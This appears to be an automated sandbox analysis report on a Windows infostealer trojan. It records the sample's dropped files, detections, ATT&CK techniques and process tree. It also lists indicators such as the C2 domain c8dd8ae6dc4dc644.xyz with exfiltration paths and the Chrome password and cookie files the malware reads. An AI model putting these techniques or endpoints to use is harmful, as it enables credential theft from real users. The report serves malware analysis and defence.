Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00438713 __EH_prolog3_GS,GetSystemTimeAsFileTime,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00458F45 GetVersionExW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

The matrix is listed here one tactic per line. Superscript counts from the original matrix (number of matching signatures) are given in parentheses; techniques without a count had no matching signature.

Initial Access: Replication Through Removable Media (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1), Native API (1), Command and Scripting Interpreter (2), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: DLL Side-Loading (1), Application Shimming (1), Browser Extensions (1), Bootkit (1), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Privilege Escalation: DLL Side-Loading (1), Application Shimming (1), Access Token Manipulation (1), Process Injection (12), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Install Root Certificate (2), Software Packing (1), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (13), Access Token Manipulation (1), Process Injection (12), Bootkit (1)
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: System Time Discovery (1), Peripheral Device Discovery (11), File and Directory Discovery (3), System Information Discovery (59), Query Registry (2), Security Software Discovery (461), Virtualization/Sandbox Evasion (13), Process Discovery (4), Remote System Discovery (11), System Network Configuration Discovery (1), Permission Groups Discovery
Lateral Movement: Replication Through Removable Media (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
Collection: Archive Collected Data (1), Man in the Browser (1), Data from Local System (1), Clipboard Data (1), Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer (1), Encrypted Channel (2), Non-Application Layer Protocol (3), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop

Behavior Graph

Behavior Graph ID: 346325 | Sample: fnhcdXEfus.exe | Start date: 30/01/2021 | Architecture: WINDOWS | Score: 90

The graph is rendered here as a process tree. Numbers kept after a process name are the badge counts shown in the original graph; "..." in paths is the graph's own abbreviation.

  • Start
    Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; 3 other signatures
    • fnhcdXEfus.exe 1 3 (started)
      DNS/IP: c8dd8ae6dc4dc644.xyz 34.94.64.66, ports 49719, 49722, 49723, GOOGLEUS, United States
      Dropped: C:\Users\user\...\63C4F3D9EA0CC861.exe (PE32); C:\...\63C4F3D9EA0CC861.exe:Zone.Identifier (ASCII)
      Signatures: Detected unpacking (creates a PE file in dynamic memory); Installs new ROOT certificates; Contains functionality to infect the boot sector; 4 other signatures
      • 63C4F3D9EA0CC861.exe 26 (started)
        DNS/IP: c8dd8ae6dc4dc644.xyz; C8DD8AE6DC4DC644.xyz
        Dropped: C:\Users\user\AppData\...\1612045890161.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
        Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to infect the boot sector; Contains functionality to detect sleep reduction / modifications
        • cmd.exe (started)
          • conhost.exe (started)
          • PING.EXE (started)
        • 1612045890161.exe 2 (started)
        • ThunderFW.exe 1 (started)
      • 63C4F3D9EA0CC861.exe 1 15 (started)
        DNS/IP: c8dd8ae6dc4dc644.xyz
        Dropped: C:\Users\user\AppData\...\Secure Preferences (UTF-8); C:\Users\user\AppData\Local\...\Preferences (ASCII)
        Signatures: Tries to harvest and steal browser information (history, passwords, etc)
        • cmd.exe 1 (started)
          Signatures: Uses ping.exe to sleep
          • conhost.exe (started)
          • PING.EXE 1 (started)
        • cmd.exe 1 (started)
          • taskkill.exe 1 (started)
          • conhost.exe (started)
      • cmd.exe 1 (started)
        DNS/IP: 127.0.0.1 unknown unknown
        Signatures: Uses ping.exe to sleep
        • conhost.exe (started)
        • PING.EXE 1 (started)
      • msiexec.exe 4 (started)
        Dropped: C:\Users\user\AppData\Local\...\MSI6DDB.tmp (PE32)
    • msiexec.exe (started)

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
fnhcdXEfus.exe | 74% | Virustotal |
fnhcdXEfus.exe | 35% | Metadefender |
fnhcdXEfus.exe | 83% | ReversingLabs | Win32.Trojan.Mingloa
fnhcdXEfus.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 35% | Metadefender |
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | 83% | ReversingLabs | Win32.Trojan.Mingloa
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\1612045890161.exe | 3% | Metadefender |
C:\Users\user\AppData\Roaming\1612045890161.exe | 14% | ReversingLabs | Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | 1% | Virustotal |
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
http://ocsp.pki.goog/gts1o1core0 | 0% | URL Reputation | safe
http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
http://ocsp.pki.goog/GTSGIAG30 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
http://ocsp.pki.goog/gsr202 | 0% | URL Reputation | safe
https://pki.goog/repository/0 | 0% | URL Reputation | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | Avira URL Cloud | safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz/info_old/w | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz//fine/send | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0# | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/r | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/e | 0% | Avira URL Cloud | safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info. | 0% | Avira URL Cloud | safe
http://c8dd8ae6dc4dc644.xyz/info_old/g | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe
https://twitter.comReferer: | 0% | Avira URL Cloud | safe
http://www.interestvideo.com/video1.php | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz:80/info_old/r | 0% | Avira URL Cloud | safe
http://C8DD8AE6DC4DC644.xyz:80/info_old/w | 0% | Avira URL Cloud | safe
http://crl.pki.goog/GTSGIAG3.crl0 | 0% | Avira URL Cloud | safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt | 0% | Avira URL Cloud | safe
https://1A469593C1FE15DC.xyz/ | 0% | Avira URL Cloud | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
C8DD8AE6DC4DC644.xyz | 34.94.64.66 | true | false | | unknown
c8dd8ae6dc4dc644.xyz | 34.94.64.66 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://C8DD8AE6DC4DC644.xyz/info_old/ddd | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz//fine/send | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/w | false | | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/r | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/e | false | Avira URL Cloud: safe | unknown
http://c8dd8ae6dc4dc644.xyz/info_old/g | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | ecvB803.tmp.11.dr | false | | high
https://duckduckgo.com/chrome_newtab | 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr | false | | high
https://duckduckgo.com/ac/?q= | 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr | false | | high
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH | 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.messenger.com/ | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | | high
http://www.msn.com | ecvB803.tmp.11.dr | false | | high
http://www.nirsoft.net | 1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://twitter.com/ookie: | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | | high
https://twitter.comsec-fetch-dest: | 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f | ecvB803.tmp.11.dr | false | | high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.pki.goog/gts1o1core0 | ecvB803.tmp.11.dr | false | URL Reputation: safe | unknown
https://maps.windows.com/windows-app-web-link | ecvB803.tmp.11.dr | false | | high
http://www.msn.com/?ocid=iehp | ecvB803.tmp.11.dr | false | | high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166 | ecvB803.tmp.11.dr | false | | high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3 | ecvB803.tmp.11.dr | false | | high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn | ecvB803.tmp.11.dr | false | | high
http://crl.pki.goog/GTS1O1core.crl0 | ecvB803.tmp.11.dr | false | URL Reputation: safe | unknown
https://www.messenger.com | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | | high
http://www.nirsoft.net/ | 1612045890161.exe, 1612045890161.exe.3.dr | false | | high
http://forms.real.com/real/realone/download.html?type=rpsp_us | 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | false | | high
http://ocsp.pki.goog/GTSGIAG30 | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2 | 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | | high
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe | 63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmp | false | | high
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | ecvB803.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id= | 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | | high
https://www.instagram.com/ | 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | false | |
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.3.drfalse
                                                  high
                                                  http://www.xunlei.com/GETdownload_engine.dll.3.drfalse
                                                    high
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvB803.tmp.11.drfalse
                                                      high
                                                      https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.messenger.com/origin:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                            high
                                                            http://pki.goog/gsr2/GTS1O1.crt0ecvB803.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvB803.tmp.11.drfalse
                                                              high
                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvB803.tmp.11.drfalse
                                                                high
                                                                https://contextual.media.net/ecvB803.tmp.11.drfalse
                                                                  high
                                                                  http://ocsp.pki.goog/gsr202ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://pki.goog/repository/0ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.twitter.com/1.1/statuses/update.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvB803.tmp.11.drfalse
                                                                      high
                                                                      http://www.msn.com/ecvB803.tmp.11.drfalse
                                                                        high
                                                                        https://upload.twitter.com/i/media/upload.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvB803.tmp.11.drfalse
                                                                            high
                                                                            https://twitter.com/compose/tweetsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674ecvB803.tmp.11.drfalse
                                                                                high
                                                                                https://www.messenger.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvB803.tmp.11.drfalse
                                                                                    high
                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvB803.tmp.11.drfalse
                                                                                      high
                                                                                      https://contextual.media.net/48/nrrV18753.jsecvB803.tmp.11.drfalse
                                                                                        high
                                                                                        http://crl.pki.goog/gsr2/gsr2.crl0?ecvB803.tmp.11.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)ecvB803.tmp.11.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=063C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://feedback.googleusercontent.com63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://C8DD8AE6DC4DC644.xyz/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.xunlei.com/download_engine.dll.3.drfalse
                                                                                              high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0#ecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.3.drfalse
                                                                                                  high
                                                                                                  https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvB803.tmp.11.drfalse
                                                                                                    high
                                                                                                    http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%dfnhcdXEfus.exefalse
                                                                                                      high
                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvB803.tmp.11.drfalse
                                                                                                        high
                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvB803.tmp.11.drfalse
                                                                                                          high
                                                                                                          https://curl.haxx.se/docs/http-cookies.html63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.openssl.org/support/faq.htmldownload_engine.dll.3.drfalse
                                                                                                              high
                                                                                                              https://www.instagram.comsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.instagram.com/accounts/login/ajax/facebook/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecvB803.tmp.11.drfalse
                                                                                                                  high
                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0MiniThunderPlatform.exe.3.drfalse
                                                                                                                    high
                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecvB803.tmp.11.drfalse
                                                                                                                      high
                                                                                                                      https://www.instagram.com/sec-fetch-site:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://twitter.comReferer:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.interestvideo.com/video1.php63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.instagram.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://C8DD8AE6DC4DC644.xyz:80/info_old/r63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.messenger.com/login/nonce/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://C8DD8AE6DC4DC644.xyz:80/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.youtube.com63C4F3D9EA0CC861.exefalse
                                                                                                                              high
                                                                                                                              https://twitter.com/compose/tweetsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.pki.goog/GTSGIAG3.crl0ecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
